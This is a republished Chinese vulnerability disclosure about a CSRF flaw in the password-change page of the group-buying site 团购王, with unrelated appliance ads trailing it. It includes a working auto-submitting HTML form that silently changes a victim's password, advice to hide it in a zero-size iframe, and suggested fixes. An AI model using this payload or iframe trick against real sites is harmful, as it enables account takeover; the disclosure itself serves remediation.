|
修改密码处无验证token,并且无验证原密码(一个涉及money的站,修改密码居然没有验证原密码!!!),可以通过一个精心构造的表单欺骗用户修改密码。 <html> <body> <form name="csrf" action="http://www.go.cn/index.php?m=settings" method="POST"> <input type=text name=password value="woooooooyun"></input> <input type=text name=password2 value="woooooooyun"></input> <input type=text name=do value="update"></input> <input type="submit" value="submit" /> </form> <script> document.csrf.submit(); </script> </body> </html>
欺骗用户访问后,密码会被改成woooooooyun。 直接让用户访问太明显了,直接会跳转到“修改成功”的页面,所以可以准备一个看似正常的页面(如新闻),然后iframe这个POC,并且height=0,width=0,用户就会在不知情的情况下被修改密码,后果可想而知了。 修复方案: 1.修改密码一定要验证原密码 2.所有涉及用户信息的操作要验证随机的token. |
正在阅读:团购王csrf可劫持用户修改密码团购王csrf可劫持用户修改密码
2017-03-14 14:14
出处:其他
责任编辑:lixianmei
- 软件版本:4.2.0.3 官方版
- 软件大小:324KBKB
- 软件授权:免费
- 适用平台: Win2000 WinXP Win2003 Win7 Win10
- 下载地址://dl.pconline.com.cn/download/373552.html
海信(Hisense)7公斤滚筒洗衣机全自动 超薄嵌入 小型家用 除菌洗 冷水护色洗HG70DA10以旧换新
1199元
西门子(SIEMENS)274升大容量家用三门冰箱 混冷无霜 零度保鲜 独立三循环 玻璃面板 KG28US221C
4899元
美的(Midea) 微波炉家用小型旋转加热20L 智能蒸煮菜单 杀菌功能 M1-L213C
509元
苏泊尔(SUPOR)电饭煲4L电饭锅电饭锅多功能一体家用蓝钻圆厚釜4-5人可做锅巴饭煲仔饭智能预约蒸米饭1-8人 SF40FC875 4升预约定时
329元
品胜 充电宝65W大功率30000毫安大容量PD20W快充户外移动电源适用笔记本电脑苹果15华为P70小米
259元
绿联何同学推荐65W氮化镓充电器套装多口Type-C快充头适用pd20W苹果15三星手机macbookPro笔记本电脑线
129元
KZ Castor双子座有线耳机入耳式双单元哈曼曲线发烧HiFi耳返耳麦
88元
格兰仕(Galanz)电烤箱 家用烤箱 40L大容量 上下独立控温 多层烘培烤箱炉灯多功能 K42 经典黑 40L 黑色
459元
美的(Midea)中药锅煎药壶 智能全自动陶电砂锅炖药锅煲 煎药机器 养生熬药壶 大容量分体式 【4L容量】长效预约JYC4002
299元
美的(Midea)电压力锅 高压锅家用5L双胆鲜汤深胆煮汤锅 智能多功能电饭煲 智能预约焖香饭智能 【5L高压浓香款】7段调压 多重口感 50Q3-FS
299元
漫步者(EDIFIER)M25 一体式电脑音响 家用桌面台式机笔记本音箱 蓝牙5.3 黑色
129元
TCL电视 85英寸 120Hz 高色域 3+64GB 2.1声道音响 平板电视机 以旧换新 85英寸 官方标配
4799元
